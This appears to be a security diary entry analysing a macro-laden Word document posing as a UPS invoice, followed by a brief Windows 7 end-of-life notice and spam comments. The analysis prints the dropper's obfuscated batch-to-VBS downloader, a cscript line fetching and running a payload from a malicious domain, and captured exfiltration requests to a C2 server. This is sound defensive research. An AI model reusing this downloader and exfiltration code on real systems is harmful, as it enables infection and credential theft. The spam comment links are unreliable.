Quick Analyzis of a(nother) Maldoc
Yesterday, one of our readers (thank David!) submitted to us a malicious document disguised as a UPS invoice. Like David, do not hesitate to share samples with us, we like malware samples! I briefly checked the document. Nothing new, based on a classic macro, it was easy to analyze and I can give you an overview of the infection process and what kind of data can be exfiltrated.
The malicious document was called 'ups_invoice_0701932_262.doc' (SHA256:be0939cbb5ba129ef316149adc474b00ad9f526513a6f6f6f6adc802290c02af) and has a current VT score of 10/61[1]. It contained some macros that, once the document opened, perform the malicious activity:
# oledump.py ups_invoice_0701932_262_doc A: word/vbaProject.bin A1: 734 'PROJECT' A2: 30 'PROJECTlk' A3: 233 'PROJECTwm' A4: 97 'UserForm1/\x01CompObj' A5: 294 'UserForm1/\x03VBFrame' A6: 883 'UserForm1/f' A7: 6688 'UserForm1/o' A8: M 1453 'VBA/Module1' A9: M 21943 'VBA/Module2' A10: M 2239 'VBA/Module3' A11: M 2331 'VBA/Module4' A12: M 252836 'VBA/NewMacros' A13: m 938 'VBA/ThisDocument' A14: m 1493 'VBA/UserForm1' A15: 8300 'VBA/_VBA_PROJECT' A16: 1302 'VBA/dir' A17: M 412655 'VBA/wLoadImages'
The infection path is the following: Word > Macro > Batch File (.cmd) >VBScript > Windows PE
The macro dumps a batch file on the disk (SHA256:96d785cdc95bff2f081f57d2c9fdee3b76daf1c3295d2b9e6298678ed32953b9). The dropped file is '%APPDATA%\..EnableDelayedExpansion\Documents1.CMD' Most of the commands are simpe “echo” that are used to create a VBS script '%APPDATA%\..EnableDelayedExpansion\gditbits.vbs'.
Sample of code with garbage words to make it more difficult to read:
@echo off
echo "93319427177886784668351442764871949889113678316627428857276359"
set mtspf=%APPDATA%\..EnableDelayedExpansion\gdibits.vbs
echo 'To determine H. pylori resistance to clarithromycin >> %mtspf%
echo 'were designed against the 23S rRNA gene >> %mtspf%
echo Dim hResBit, MpicOffer, xmpage, MenuPrice, ListPrice, Fundament, BufferBat >> %mtspf%
echo On Error Resume Next >> %mtspf%
echo. >> %mtspf%
echo Set hResBit = Wscript.Arguments >> %mtspf%
echo 'To determine H. pylori resistance to clarithromycin >> %mtspf%
echo 'were designed against the 23S rRNA gene >> %mtspf%
echo "471495911668846928514952834168735538343318577458669595"
echo "137756746277365597113689825816848246219143776556384827"
echo "589196889244714223435471453592227671689523411938182673"
echo "714793381962982623587978735968646573151481843754943393"
echo Set MpicOffer = CreateObject("MSXML2.ServerXMLHTTP.6.0") >> %mtspf%
echo "72797134559562738358938549883642286878881617597196952189815336"
echo ListPrice = hResBit(0) >> %mtspf%
echo Fundament = hResBit(1) >> %mtspf%
echo 'The most common question that restaurants are asking us revolve >> %mtspf%
echo 'special accommodations) that may be requested >> %mtspf%
echo. >> %mtspf%
echo MpicOffer.Open "GET", ListPrice, False >> %mtspf%
Then the VBS script is launched with two arguments (see above the Wscript.Arguments):
cscript //nologo %APPDATA%\..EnableDelayedExpansion\gdibits.vbs hxxps://greatingusa[.]com/red1.res %APPDATA%\..EnableDelayedExpansion\hddput8.exe
Finally, hddput8.exe is launched:
start %APPDATA%\..EnableDelayedExpansion\hddput8.exe"
The PE file (SHA256:cfd98c1ee7ab19a63b31bcb6be133e6b61ce723f94a8f91741983bf79b4d1158) has a VT score of 44/72[2]
Here are same POST HTTP requests with exfiltrated data performed by the malware:
POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/90 HTTP/1.1 Content-Type: multipart/form-data; boundary=aksgja8s8d8a8s97 User-Agent: KSKJJGJ Host: 203.176.135.102:8082 Content-Length: 4419 Cache-Control: no-cache --aksgja8s8d8a8s97 Content-Disposition: form-data; name="proclist" ***TASK LIST*** [System Process] System smss.exe csrss.exe wininit.exe csrss.exe winlogon.exe services.exe lsass.exe lsm.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe taskhost.exe dwm.exe svchost.exe svchost.exe svchost.exe notepad.exe calc.exe svchost.exe notepad.exe explorer.exe iexplore.exe WmiPrvSE.exe rundll32.exe svchost.exe --aksgja8s8d8a8s97 Content-Disposition: form-data; name="sysinfo" ***S Y S T E M I N F O*** HostName: 3OwiR2Q OSName: Microsoft Windows 7 Professional OSVersion: Service Pack 1 OSArchitecture: 64-bit ProductType: Workstation BuildType: Multiprocessor Free RegisteredOwner: Zahwl3xniYy RegisteredOrg: CVDh5l614 SerialNumber: 00371-222-2524677-68218 InstallDate: 30/12/1899 00.00.00 LastBootUpTime: 30/12/1899 00.00.00 WindowsDirectory: C:\Windows SystemDirectory: C:\Windows\system32 BootDevice: \Device\HarddiskVolume1 TotalPhysicalMemory: 3127 Mb AvailablePhysicalMemory: 3127 Mb /c ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : <redacted> Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Realtek RTL8139C+ Fast Ethernet NIC Physical Address. . . . . . . . . : <redacted> DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes Link-local IPv6 Address . . . . . : <Redacted>(Preferred) IPv4 Address. . . . . . . . . . . : 192.168.100.6(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Lease Obtained. . . . . . . . . . : Thursday, January 09, 2019 6:19:19 AM Lease Expires . . . . . . . . . . : Thursday, January 16, 2156 1:08:23 AM Default Gateway . . . . . . . . . : 192.168.100.1 DHCP Server . . . . . . . . . . . : 192.168.100.1 DHCPv6 IAID . . . . . . . . . . . : 240276480 DHCPv6 Client DUID. . . . . . . . : <Redacted> DNS Servers . . . . . . . . . . . : 8.8.8.8 NetBIOS over Tcpip. . . . . . . . : Disabled /c net config workstation Computer name \\<Redacted> Full Computer name <Redacted> User name Administrator Workstation active on Software version Windows 7 Professional Workstation domain WORKGROUP Workstation Domain DNS Name <Redacted>.com Logon domain TESTER COM Open Timeout (sec) 0 COM Send Count (byte) 16 COM Send Timeout (msec) 250 The command completed successfully. /c net view /all There are no entries in the list. /c net view /all /domain There are no entries in the list. /c nltest /domain_trusts Enumerating domain trusts failed: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF /c nltest /domain_trusts /all_trusts Enumerating domain trusts failed: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF --aksgja8s8d8a8s97-- HTTP/1.1 200 OK server: Cowboy date: Thu, 09 Jan 2020 09:41:52 GMT content-length: 3 Content-Type: text/plain /1/
POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/81/ HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Host: 203.176.135.102 Connection: close Content-Type: multipart/form-data; boundary=---------PAOUUIBNQKZQDUJR Content-Length: 210 -----------PAOUUIBNQKZQDUJR Content-Disposition: form-data; name="data" -----------PAOUUIBNQKZQDUJR Content-Disposition: form-data; name="source" OpenSSH private keys -----------PAOUUIBNQKZQDUJR-- HTTP/1.1 200 OK connection: close server: Cowboy date: Thu, 09 Jan 2020 09:42:07 GMT content-length: 3 Content-Type: text/plain /1/
POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/83/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 203.176.135.102
Connection: close
Content-Type: multipart/form-data; boundary=---------QPKAEZSIUTKMSAWM
Content-Length: 299
-----------QPKAEZSIUTKMSAWM
Content-Disposition: form-data; name="formdata"
{]}
-----------QPKAEZSIUTKMSAWM
Content-Disposition: form-data; name="billinfo"
{]}
-----------QPKAEZSIUTKMSAWM
Content-Disposition: form-data; name="cardinfo"
{SQL logic error
-----------QPKAEZSIUTKMSAWM--
HTTP/1.1 200 OK
connection: close
server: Cowboy
date: Thu, 09 Jan 2020 09:41:16 GMT
content-length: 3
Content-Type: text/plain
/1/
POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/81/ HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Host: 203.176.135.102 Connection: close Content-Type: multipart/form-data; boundary=---------ITSDTHZDVZQGMVVI Content-Length: 219 -----------ITSDTHZDVZQGMVVI Content-Disposition: form-data; name="data" -----------ITSDTHZDVZQGMVVI Content-Disposition: form-data; name="source" OpenVPN passwords and configs -----------ITSDTHZDVZQGMVVI-- HTTP/1.1 200 OK connection: close server: Cowboy date: Thu, 09 Jan 2020 09:41:41 GMT content-length: 3 Content-Type: text/plain /1/
Note that, at the time I'm writing this diary, the domain 'greatingusa[.]com' is still active.
[1] https://www.virustotal.com/gui/file/be0939cbb5ba129ef316149adc474b00ad9f526513a6f6f6f6adc802290c02af/detection
[2] https://www.virustotal.com/gui/file/cfd98c1ee7ab19a63b31bcb6be133e6b61ce723f94a8f91741983bf79b4d1158/detection
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Windows 7 - End of Life
A quick reminder note today for everyone. Microsoft Windows 7 operating system is at End of Life on January 14, 2020. [1]
Yep, that's Patch Tuesday ! So you get one more update on the books before it stops.
There will be no more free updates to the Win 7 OS for users. While using, installing and activating Windows 7 it is still possible after January 14, it is recommended that all instances be upgraded to Windows 10 operating systems. If you have the need to extend your support, then Microsoft has a program you should inquire about. [2]
If you need to know the lifecycle of any Microsoft product check out the link below. [3]
-Kevin
--
ISC Handler on Duty
[1] https://www.microsoft.com/en-us/microsoft-365/windows/end-of-windows-7-support
[2] https://support.microsoft.com/en-us/help/4497181/lifecycle-faq-extended-security-updates
[3] https://support.microsoft.com/en-us/lifecycle/search
Comments
Anonymous
Dec 3rd 2022
9 months ago
Anonymous
Dec 3rd 2022
9 months ago
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.
<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
Anonymous
Dec 26th 2022
9 months ago
Anonymous
Dec 26th 2022
9 months ago
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
Anonymous
Dec 26th 2022
9 months ago
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
Anonymous
Dec 26th 2022
9 months ago
Anonymous
Dec 26th 2022
9 months ago
https://defineprogramming.com/
Dec 26th 2022
9 months ago
distribute malware. Even if the URL listed on the ad shows a legitimate website, subsequent ad traffic can easily lead to a fake page. Different types of malware are distributed in this manner. I've seen IcedID (Bokbot), Gozi/ISFB, and various information stealers distributed through fake software websites that were provided through Google ad traffic. I submitted malicious files from this example to VirusTotal and found a low rate of detection, with some files not showing as malware at all. Additionally, domains associated with this infection frequently change. That might make it hard to detect.
https://clickercounter.org/
https://defineprogramming.com/
Dec 26th 2022
9 months ago
rthrth
Jan 2nd 2023
8 months ago